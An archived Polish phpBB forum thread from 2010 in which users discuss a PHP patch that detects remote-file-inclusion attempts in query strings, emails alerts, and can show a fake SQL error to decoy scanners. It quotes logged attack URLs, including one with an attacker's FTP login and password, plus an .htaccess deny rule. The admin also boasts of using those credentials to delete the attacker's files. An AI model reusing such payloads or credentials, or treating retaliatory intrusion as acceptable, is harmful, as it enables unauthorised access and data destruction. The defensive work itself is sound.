Archiwum - 1.12.7 - globalne zabezpieczenie przeciw w?amaniom
mbru - 01-02-2010, 19:34
Do p. Przemo
Sprawdziłem ten link co Pan podał pierw po zalogowaniu na Pańskim Forum
| Kod: | | /index.php?test=phpbb_root_path=http://test.test/test |
I pokazało
Edytowałem ten plik wg instrukcji i u mnie po dodaniu tego adresu co jest powyżej przychodzi meil z informacją
| Kod: | Atak na zmienna: test
Danymi: phpbb_root_path=http://test.test/test
Atak z IP: HOST: |
Czy jest to normalne po wgraniu poprawki bezpieczeństwa.
Polaczek - 01-02-2010, 19:35
| Cytat: | | Czy jest to normalne po wgraniu poprawki bezpieczeństwa. |
Tak.
Zobacz użyta funkcja mail:
| Cytat: | if ( count($HTTP_GET_VARS) )
{
foreach($HTTP_GET_VARS as $key => $val)
{
if ( strlen($val) > 18 && !preg_match('#^[a-z0-9_ /+]*={0,2}$#i', $val) && $key != 'redirect' && $key != 'highlight' )
{
$txt = "Atak na zmienna: ".$key."\n\r";
$txt .= "Danymi: ".$val."\n\r";
$txt .= "Atak z IP: ".$HTTP_SERVER_VARS['REMOTE_ADDR']." HOST: ".gethostbyaddr($HTTP_SERVER_VARS['REMOTE_ADDR'])."\n\r";
$txt .= "Adres referer: ".$HTTP_SERVER_VARS['HTTP_REFERER']."\n\r";
mail($board_config['email_from'], 'Proba ataku na zmienna: '.$key, $txt);
die('Hacking attempt');
}
}
} |
mbru - 01-02-2010, 19:41
Dziękuję za informacje.
AlDente - 02-02-2010, 11:16
Kolejny błąd pojawia się, gdy sprawdzamy adres IP autora postu, nastęnie zamieniamy na HOST opcją [ IP <-> Host ] a potem znowu na IP.
| Kod: | Atak na zmienna: rdns
Danymi: public12345.xdsl.centertel.pl
Adres referer: http://mojastrona.pl/modcp.php?mode=ip&p=253123&t=36123&rdns=79.163.100.200&sid=3c49b8f82873a10d41245632b287d762
|
Polaczek - 02-02-2010, 11:49
No właśnie to za duży URL jest. Wcześniej poruszane - http://www.przemo.org/php...p=510658#510658
Przemo - 03-02-2010, 21:32
W standardzie nie bedzie wogole opcji wysylajacej mail  Ale bedzie napewno gdzies tutaj instrukcja jak ja dodac (wasnie ta jedna linie)
Kurcze ja tutaj dostaje jakies 700 maili w ciagu dnia. Wstawielm tam po wysylce maila sleep(40) zeby zmulic troche im te skanery  No i zrobilem tez ciekawostke zeby skanery myslaly ze znalazly dziure: http://www.przemo.org/php..._asdqwKJHKJHJKH (trzeba czekac)
Jak ktos bardzo chce to: | Kod: | if ( count($HTTP_GET_VARS) )
{
foreach($HTTP_GET_VARS as $key => $val)
{
if ( strlen($val) > 18 && !preg_match('#^[a-z0-9_ /+]*={0,2}$#i', $val) && $key != 'highlight' && $key != 'redirect' )
{
$txt = "Atak na zmienna: ".$key."\n\r";
$txt .= "Danymi: ".$_SERVER['REQUEST_URI']."\n\r";
$txt .= "Atak z IP: ".$HTTP_SERVER_VARS['REMOTE_ADDR']." HOST: ".gethostbyaddr($HTTP_SERVER_VARS['REMOTE_ADDR'])."\n\r";
$txt .= "Adres referer: ".$HTTP_SERVER_VARS['HTTP_REFERER']."\n\r";
mail($board_config['email_from'], 'Proba ataku na zmienna: '.$key, $txt);
sleep(40);
echo '<br />
<b>Notice</b>: Undefined variable: '.htmlspecialchars($val).' in <b>/home/przemo/public_html/phpBB2/forum/common.php</b> on line <b>320</b><br />
<html>
<body>
phpBB : <b>Critical Error</b>
<br /><br />
Could not query config information<br /><br /><b><u>DEBUG MODE</u></b><br /><br />SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'SELECT *
FROM przemo_config WHERE '.htmlspecialchars($key).' = '.htmlspecialchars($val).'\' at line 1<br /><br />SELECT *
FROM przemo_config WHERE '.htmlspecialchars($key).' = '.htmlspecialchars($val).'<br /><br />Line : 322<br />File : common.php<span class="gensmall"></span></body>
</html>';
exit;
}
}
}
|
Tylko zmiencise sobie "przemo" na jakies swoje katalogi czy prefixy
Przemo - 03-02-2010, 21:50
Nie wiem czy zmylka pojdzie do standardu, to troche "dziwne" i wkurza ewentualnych hakerow, chyba, ze jako opcja ale to troche za duzo konfiguracji Napewno takie zabezpieczenie bedzie a czy bedzie zmylka? ... chyba nie.
AlDente - 03-02-2010, 22:22
ja dzisiaj otrzymałem 20 maili pod rząd, z takim komunikatem:
| Kod: | Atak na zmienna: t
Danymi: http://217.218.225.2:2082/index.html?
Atak z IP: 79.163.*.* HOST: public399**.xdsl.centertel.pl
Adres referer: |
Po wrzuceniu w google adresu 217.218.225.2:2082/index.html?
znalazłem coś takiego:
http://www.smf.pl/forum/index.php?topic=5330.0
dokładnie chodzi o te linijkę
| Kod: | | http://AdresMojegoForum/index.php?topic=http://217.218.225.2:2082/index.html? |
Czy to próba hacku, czy zbieg okoliczności ?
Narzędzie może posłużyć jako wyszukiwarka dziur
Dobra robota
Przemo - 03-02-2010, 22:27
AlDente, to sa skanery szukajace dziur, nie przejmuj sie.
BUHAHA przed chwila dostalem maila: | Kod: | Atak na zmienna: t
Danymi: /phpBB2/forum/viewtopic.php?t=68184///modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? |
zgadnijcie co zrobilem? Mial na tym FTP rozne shelle i inne syfy
jeszcze nigdy nie kasowalem katalogu "public_html" 
Dla osób nie znających tematu wyjasnie, że: | Kod: | | ftp://leejinseo:vmfldrmftm@114.108.131.23 |
To skrócony zapis wejścia na FTP wymagajace autoryzacji, leejinseo to login a vmfldrmftm to haslo
Polaczek - 03-02-2010, 22:56
Przemo, ktoś chciał się włamać hehe dobre
AlDente - 03-02-2010, 22:58
| Przemo napisał/a: | | to sa skanery szukajace dziur, nie przejmuj sie. |
ulzylo mi Tylko troche dziwi mnie fakt, ze skanowanie zainicjowano z polskiej sieci orange.
| Przemo napisał/a: | | jeszcze nigdy nie kasowalem katalogu "public_html" |
i jakie to uczucie ? Wlasciciel pewnie sie ucieszy 
Przemo - 03-02-2010, 23:19
| AlDente napisał/a: | | Wlasciciel pewnie sie ucieszy |
Wlascicielem jest lama, ktora uzywala skanera
tosiek - 06-02-2010, 12:45
ja od siebie dodam prostszy sposób z htaccess 
| Kod: | RewriteCond %{QUERY_STRING} https?:// [NC,OR]
RewriteCond %{QUERY_STRING} \.\. [OR]
RewriteCond %{QUERY_STRING} %00$
RewriteRule .* - [F,L] |
tylko do tej pory nie wiem jak taki adres przepisać na jakikolwiek skrypt, zawsze wywala error 500, dlatego można utworzyć własna stronę błędu 403 i tam zbanować albo cuś
to jest trochę irytujące te zapytania, dostawałem tak ze 300 info dziennie o bledzie 404 bo mi na wordpressie próbowali zapytaniami z phpbb się włamać 
anr - 06-02-2010, 13:59
Wpisałem w common.php wedle instrukcji z pierwszego postu.
Sprawdziłem z index.php z linijką test
| Kod: | | adresforum/index.php?test=phpbb_root_path=http://test.test/test |
i wyskoczyło ot co ?
| Kod: |
Forbidden
You don't have permission to access //index.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Power MOD by linuxpl.com Server at fpscs.net Port 80
|
to normalne ?
nie powinno być
Hacking attempt
Przemo - 07-02-2010, 01:46
Moze cos zle wpisales bo widze w komunikacie bledu dwa ukosniki: //
Panowie testujcie to dalej czy nie wylapiemy jeszcze jakis miejsc na forum gdzie to sie gryzie. Powiedzcie swoim moderatorom ze jak cos takiego zbacza to niech skopiuja adres URL i dadza Wam znac.
|
|
|
